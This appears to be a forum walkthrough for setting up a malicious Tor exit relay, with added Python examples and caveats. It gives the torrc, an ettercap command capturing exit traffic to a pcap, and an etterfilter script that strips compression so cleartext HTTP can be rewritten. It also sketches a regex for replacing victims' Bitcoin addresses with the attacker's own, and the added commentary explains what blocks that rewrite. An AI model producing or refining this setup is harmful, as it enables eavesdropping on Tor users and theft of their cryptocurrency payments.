So, in light of recent events, I thought I'd show you a quick way to set up a Tor MiTM relay. This was done on Debian Buster (10.5).
Let's install Tor (you can get the latest packages by adding the Tor Project repo to /etc/apt/sources.list; the Buster packages are fine for this walkthrough):
Code
apt update
apt install tor
When those packages have finished installing, Debian starts the tor service automatically, so stop it before touching the config:
Code
systemctl stop tor
Now remove the default Tor config
Code
rm /etc/tor/torrc
Now create a new torrc file and paste the following
Code
touch /etc/tor/torrc
Code
SOCKSPort 192.168.0.1:9100 # the only SOCKS listener; the address must exist on this box. With an explicit SOCKSPort, Tor does NOT also open the default 127.0.0.1:9050
ExitPolicy accept *:80-444 # exit policy is first-match, top to bottom: ports 80-444 (443 included) are accepted here
ExitPolicy reject *:82-6500 # 82-444 were already accepted above, so this line only affects 445-6500; anything not listed falls through to Tor's default exit policy
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D # DO NOT USE THIS PASSWORD! Generate your own (see below)
Nickname YOURRELAYNAME # CHANGE ME: 1-19 characters, letters and digits only, no spaces
ORPort 9001
# SocksListenAddress 127.0.0.1 is deprecated; the address in the SOCKSPort line above already binds the listener
Remember to generate your own HashedControlPassword value with the following command (paste its output into the torrc; comments use # and nothing else may follow the value on the line) and to set the Nickname to whatever you want:
Code
tor --hash-password YOURPASSWORD
Now we are ready to run Tor. If you kept the file at /etc/tor/torrc it is the default config anyway, but pass it explicitly; run it as an unprivileged user, not as root (Tor warns if started as root, and an unprivileged user cannot read /var/lib/tor, so Tor keeps its keys and state under ~/.tor by default). Note that once the ORPort is reachable the relay publishes its descriptor to the directory authorities, so an exit relay is public:
Code
tor -f /etc/tor/torrc
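Before starting the relay it is worth checking what the two ExitPolicy lines really allow. The following is an added example, not part of the original post: a first-match evaluator for ExitPolicy lines, written in Python here to make the semantics explicit (Tor reads the lines top to bottom and the first line whose port range matches wins; anything your lines do not decide falls through to Tor's built-in default policy). The default policy list is copied from the tor(1) manual and should be checked against the man page of the version you run; the two policies it evaluates are the page's own lines and an HTTP-only policy that does what the post presumably intends.

```python
import re
from typing import Dict, List, Optional, Tuple

# One parsed line: (action, address pattern, low port, high port)
Rule = Tuple[str, str, int, int]

# Matches "ExitPolicy accept|reject ADDR:PORTSPEC" with an optional trailing # comment.
_RULE = re.compile(
    r"^\s*ExitPolicy\s+(accept|reject)\s+(\S+?):(\*|\d+(?:-\d+)?)\s*(?:#.*)?$"
)


def parse_exit_policy(torrc_text: str) -> List[Rule]:
    """Pull the ExitPolicy lines out of torrc text, preserving their order."""
    rules: List[Rule] = []
    for line in torrc_text.splitlines():
        m = _RULE.match(line)
        if not m:
            continue
        action, addr, ports = m.groups()
        if ports == "*":
            lo, hi = 1, 65535
        elif "-" in ports:
            lo, hi = (int(p) for p in ports.split("-", 1))
        else:
            lo = hi = int(ports)
        rules.append((action, addr, lo, hi))
    return rules


def first_match(rules: List[Rule], port: int) -> Optional[str]:
    """Tor semantics: the first line whose port range contains PORT wins.
    Only '*' address patterns are modelled, which is all the torrc uses."""
    for action, addr, lo, hi in rules:
        if addr != "*":
            raise ValueError("only '*' address patterns are modelled here")
        if lo <= port <= hi:
            return action
    return None


# Tor's built-in default exit policy as documented in tor(1); verify against the
# man page of your version.  It decides anything your own lines do not.
DEFAULT_POLICY = """
ExitPolicy reject *:25
ExitPolicy reject *:119
ExitPolicy reject *:135-139
ExitPolicy reject *:445
ExitPolicy reject *:563
ExitPolicy reject *:1214
ExitPolicy reject *:4661-4666
ExitPolicy reject *:6346-6429
ExitPolicy reject *:6699
ExitPolicy reject *:6881-6999
ExitPolicy accept *:*
"""


def decide(policy_text: str, port: int) -> Tuple[Optional[str], str]:
    """Return (action, decided_by) for a destination port: your lines first,
    then the default policy."""
    action = first_match(parse_exit_policy(policy_text), port)
    if action is not None:
        return action, "torrc"
    return first_match(parse_exit_policy(DEFAULT_POLICY), port), "default"


# The two lines from the torrc above, verbatim.
PAGE_POLICY = """
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
"""

# What the post presumably wants: exit only to HTTP and HTTPS, nothing else.
HTTP_ONLY_POLICY = """
ExitPolicy accept *:80
ExitPolicy accept *:443
ExitPolicy reject *:*
"""


def summarize(policy_text: str, ports=(22, 25, 80, 443, 445, 6500, 8080)) -> Dict[int, Tuple[Optional[str], str]]:
    """Evaluate a handful of interesting destination ports against a policy."""
    return {p: decide(policy_text, p) for p in ports}


if __name__ == "__main__":
    for name, text in (("page torrc", PAGE_POLICY), ("http-only", HTTP_ONLY_POLICY)):
        print(name)
        for port, (action, by) in summarize(text).items():
            print(f"  port {port:>5}: {action:6} (decided by {by})")
```

With the page's two lines, port 445 and everything up to 6500 is rejected, but ports 22, 8080 and most others are still accepted via the default policy, so the relay exits far more than HTTP. Tor itself will tell you about syntax problems before you go live: `tor --verify-config -f /etc/tor/torrc` parses the file and exits.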
Wait until Tor finishes connecting (the log ends with "Bootstrapped 100%"), then open a new root terminal; now it's time to install ettercap (you could use another sniffer if you wanted):
Code
apt install ettercap
Now our relay is up and running, so how do we start sniffing the traffic? With one simple command (-T is text mode, -w writes the capture to a pcap, -E prints extended headers for every packet, -i selects the interface; use whichever interface carries your exit traffic, wlp2s0 here):
Code
ettercap -T -w dump.pcap -E -i wlp2s0
This is now a Tor relay that captures everything crossing the interface, but be clear about what is actually readable: traffic between you and other relays is Tor's own TLS, so the only cleartext you will see is exit traffic, i.e. streams this relay decrypts and forwards to their final destination, and of those only the ones whose application protocol is itself plaintext (HTTP on port 80; HTTPS on 443 stays encrypted end to end). You could probably add a filter to modify traffic on the fly. (Currently I'm trying to get this working with a regex; if anyone has any ideas about this then send me a PM. I've already got the filter ready, it just needs a little tweaking.) The filter for replacing text is below. Adding something like (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script would, in theory, let you replace any Bitcoin address with your own. Three caveats: the ^ and $ anchors never match in the middle of a packet payload, so they have to go; etterfilter's search() and replace() take literal strings, and regex matching needs its pcre_regex() function, which only exists when ettercap was built with PCRE support; and ettercap only rewrites packets it forwards on behalf of other hosts, while packets the local Tor process sends itself are captured passively, so on the relay a filter will log matches but not change what goes out on the wire. The pattern also only matches legacy (1... and 3...) addresses, not bech32 (bc1...) ones.
Code
##
# This filter replaces certain strings in TCP packets
# before the packet is forwarded to the target host.
# Based on code from ALoR, NaGA & Morpheus.
##
##########################
## Zap Content Encoding ##
##########################
# Strip the client's Accept-Encoding header so the server answers with plain,
# uncompressed text that later search()/replace() calls can see.
# 127.0.0.1 is a local test target; exit traffic goes to remote hosts, so drop
# or change the ip.dst test before using this on the relay.
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      # the replacement is the same length (15 bytes) as the original, so the
      # packet length and TCP sequence numbers stay untouched
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("\n[test] host:127.0.0.1 [ -> ] found");
      msg("[test] |_ packet Accept-Encoding zapped\n");
   }
}
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
   msg("[test] host:127.0.0.1 [ <- ] port:80 http");
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    "); # note: four spaces in the replacement string, same length as "gzip"
   }
}
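To see what the filter above actually does to a request, and why the Bitcoin pattern as written would never fire, here is an added example that is not part of the original post: a Python model of etterfilter's literal same-length replace() applied to a constructed cleartext HTTP request, alongside the post's anchored regex and an unanchored version of it. The request, host name and the address in it are made up for this example (the address merely fits the legacy format); Python is used only to demonstrate the matching and length rules, not as a replacement for etterfilter.

```python
import re
from typing import List, Tuple

# Constructed cleartext HTTP request, the kind of thing an exit sees on port 80.
# The address is a made-up value that only fits the legacy base58 format.
REQUEST = (
    b"POST /donate HTTP/1.1\r\n"
    b"Host: example.org\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"addr=1ExampLeAddressNotReaLxxxxxxxxxx&amount=0.01"
)

# The post's pattern as written: anchored to the start and end of the buffer,
# which a packet payload never satisfies.
ANCHORED_BTC = re.compile(rb"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$")

# Same character class without anchors; the lookarounds stop it from matching
# a base58-looking run inside a longer token.
LEGACY_BTC = re.compile(
    rb"(?<![A-Za-z0-9])[13][a-km-zA-HJ-NP-Z1-9]{25,34}(?![A-Za-z0-9])"
)


def anchored_matches(payload: bytes) -> List[bytes]:
    """What the post's anchored regex finds in a packet payload (nothing)."""
    return ANCHORED_BTC.findall(payload)


def find_legacy_addresses(payload: bytes) -> List[Tuple[int, bytes]]:
    """(offset, address) for every legacy-format address in the payload."""
    return [(m.start(), m.group(0)) for m in LEGACY_BTC.finditer(payload)]


def same_length_replace(payload: bytes, old: bytes, new: bytes) -> bytes:
    """Model of etterfilter's replace() under the discipline the filter above
    follows: the replacement is exactly as long as the original, so the
    segment length and TCP sequence numbers need no adjustment."""
    if len(old) != len(new):
        raise ValueError(f"replacement length {len(new)} != original {len(old)}")
    return payload.replace(old, new)


def zap_encoding(payload: bytes) -> bytes:
    """The two edits the 'Zap Content Encoding' filter makes on a request."""
    payload = same_length_replace(payload, b"Accept-Encoding", b"Accept-Rubbish!")
    payload = same_length_replace(payload, b"gzip", b"    ")  # four spaces
    return payload


if __name__ == "__main__":
    print("anchored pattern finds:", anchored_matches(REQUEST))
    print("unanchored pattern finds:", find_legacy_addresses(REQUEST))
    print(zap_encoding(REQUEST).decode())
```

The same-length rule is also why address swapping is harder than the one-liner suggests: legacy addresses are 26 to 35 characters long, so a replacement of a different length changes the TCP payload size and the sequence numbers of everything that follows. The real filter is compiled with `etterfilter filter.ecf -o filter.ef` and loaded into ettercap with `-F filter.ef`.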